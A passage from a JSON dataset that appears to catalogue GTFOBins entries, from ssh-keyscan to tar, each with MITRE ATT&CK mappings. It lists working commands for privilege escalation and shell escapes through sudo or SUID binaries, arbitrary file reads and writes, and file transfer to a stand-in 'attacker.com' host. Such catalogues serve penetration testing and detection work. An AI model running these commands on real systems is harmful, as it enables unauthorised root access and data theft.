function.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"]},{"id":"gtfo:ssh-keyscan:file-read:0:sudo","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"]},{"id":"gtfo:ssh-keyscan:file-read:0:suid","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"]},{"id":"gtfo:ssh-keyscan:file-read:0:unprivileged","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"]},{"id":"gtfo:sshfs:command:0:sudo","toolId":"gtfo:sshfs","toolName":"sshfs","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sshfs -o ssh_command=/path/to/command x: /path/to/dir/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshfs:command:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"sshfs -o ssh_command=/path/to/command x: /path/to/dir/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshfs:download:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/dir/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshfs:shell:0:sudo","toolId":"gtfo:sshfs","toolName":"sshfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file\nchmod +x /path/to/temp-file\nsshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/","description":"The mount dir must be writable by the invoking user.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshfs:shell:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file\nchmod +x /path/to/temp-file\nsshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/","description":"The mount dir must be writable by the invoking user.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshfs:upload:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/input-file /path/to/dir/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshpass:shell:0:sudo","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sshpass /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshpass/"]},{"id":"gtfo:sshpass:shell:0:suid","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sshpass /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sshpass/"]},{"id":"gtfo:sshpass:shell:0:unprivileged","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sshpass /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshpass/"]},{"id":"gtfo:sshuttle:shell:0:sudo","toolId":"gtfo:sshuttle","toolName":"sshuttle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sudo sshuttle -r x --ssh-cmd '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' localhost","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshuttle/"]},{"id":"gtfo:start-stop-daemon:shell:0:sudo","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"]},{"id":"gtfo:start-stop-daemon:shell:0:suid","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh -- -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"]},{"id":"gtfo:start-stop-daemon:shell:0:unprivileged","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"]},{"id":"gtfo:stdbuf:shell:0:sudo","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/stdbuf/"]},{"id":"gtfo:stdbuf:shell:0:suid","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/stdbuf/"]},{"id":"gtfo:stdbuf:shell:0:unprivileged","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/stdbuf/"]},{"id":"gtfo:strace:file-write:0:sudo","toolId":"gtfo:strace","toolName":"strace","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"strace -s 999 -o /path/to/output-file strace - DATA","description":"The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of `strace - DATA`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strace/"]},{"id":"gtfo:strace:file-write:0:unprivileged","toolId":"gtfo:strace","toolName":"strace","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"strace -s 999 -o /path/to/output-file strace - DATA","description":"The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of `strace - DATA`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strace/"]},{"id":"gtfo:strace:shell:0:sudo","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strace/"]},{"id":"gtfo:strace:shell:0:suid","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/strace/"]},{"id":"gtfo:strace:shell:0:unprivileged","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strace/"]},{"id":"gtfo:strings:file-read:0:sudo","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strings/"]},{"id":"gtfo:strings:file-read:0:suid","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/strings/"]},{"id":"gtfo:strings:file-read:0:unprivileged","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strings/"]},{"id":"gtfo:su:shell:0:sudo","toolId":"gtfo:su","toolName":"su","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"su -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/su/"]},{"id":"gtfo:sudo:shell:0:sudo","toolId":"gtfo:sudo","toolName":"sudo","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sudo /bin/sh","description":"The invocation is actually `sudo sudo ...`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sudo/"]},{"id":"gtfo:sysctl:command:0:sudo","toolId":"gtfo:sysctl","toolName":"sysctl","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sysctl 'kernel.core_pattern=|/path/to/command'","description":"The command is executed by `root` in the background when a core dump occurs.\n\nTo trigger a core dump, send the `SIGQUIT` signal to a process, for example:\n\n```\nsleep infinity &\nkill -QUIT $!\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sysctl/"]},{"id":"gtfo:sysctl:command:0:suid","toolId":"gtfo:sysctl","toolName":"sysctl","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sysctl 'kernel.core_pattern=|/path/to/command'","description":"The command is executed by `root` in the background when a core dump occurs.\n\nTo trigger a core dump, send the `SIGQUIT` signal to a process, for example:\n\n```\nsleep infinity &\nkill -QUIT $!\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sysctl/"]},{"id":"gtfo:sysctl:file-read:0:sudo","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sysctl/"]},{"id":"gtfo:sysctl:file-read:0:suid","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sysctl/"]},{"id":"gtfo:sysctl:file-read:0:unprivileged","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sysctl/"]},{"id":"gtfo:systemctl:inherit:0:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemctl:inherit:0:suid","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemctl:inherit:0:unprivileged","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemctl:shell:0:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[Service]\nType=oneshot\nExecStart=/path/to/command\n[Install]\nWantedBy=multi-user.target' >/path/to/temp-file.service\nsystemctl link /path/to/temp-file.service\nsystemctl enable --now /path/to/temp-file.service","description":"It might happen that the service is not started with `--now`, in such cases it might be necessary to manually start it.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemctl:shell:0:suid","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[Service]\nType=oneshot\nExecStart=/path/to/command\n[Install]\nWantedBy=multi-user.target' >/path/to/temp-file.service\nsystemctl link /path/to/temp-file.service\nsystemctl enable --now /path/to/temp-file.service","description":"It might happen that the service is not started with `--now`, in such cases it might be necessary to manually start it.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemctl:shell:1:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\nSYSTEMD_EDITOR=/path/to/temp-file systemctl edit basic.target","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemd-resolve:inherit:0:sudo","toolId":"gtfo:systemd-resolve","toolName":"systemd-resolve","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemd-resolve --status","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-resolve/"]},{"id":"gtfo:systemd-run:command:0:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"systemd-run /path/to/command","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"]},{"id":"gtfo:systemd-run:shell:0:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"systemd-run -S","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"]},{"id":"gtfo:systemd-run:shell:1:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"systemd-run -t /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"]},{"id":"gtfo:tac:file-read:0:sudo","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tac/"]},{"id":"gtfo:tac:file-read:0:suid","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tac/"]},{"id":"gtfo:tac:file-read:0:unprivileged","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tac/"]},{"id":"gtfo:tail:file-read:0:sudo","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tail/"]},{"id":"gtfo:tail:file-read:0:suid","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tail/"]},{"id":"gtfo:tail:file-read:0:unprivileged","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tail/"]},{"id":"gtfo:tailscale:upload:0:sudo","toolId":"gtfo:tailscale","toolName":"tailscale","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tailscale serve --http=12345 /path/to/input-file","description":"The URL is reachable by any host of the same Tailnet.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tailscale/"]},{"id":"gtfo:tar:download:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:download:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:download:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-read:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-read:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-read:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-write:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-write:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-write:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:1:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:1:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:1:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:2:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:2:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:2:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the 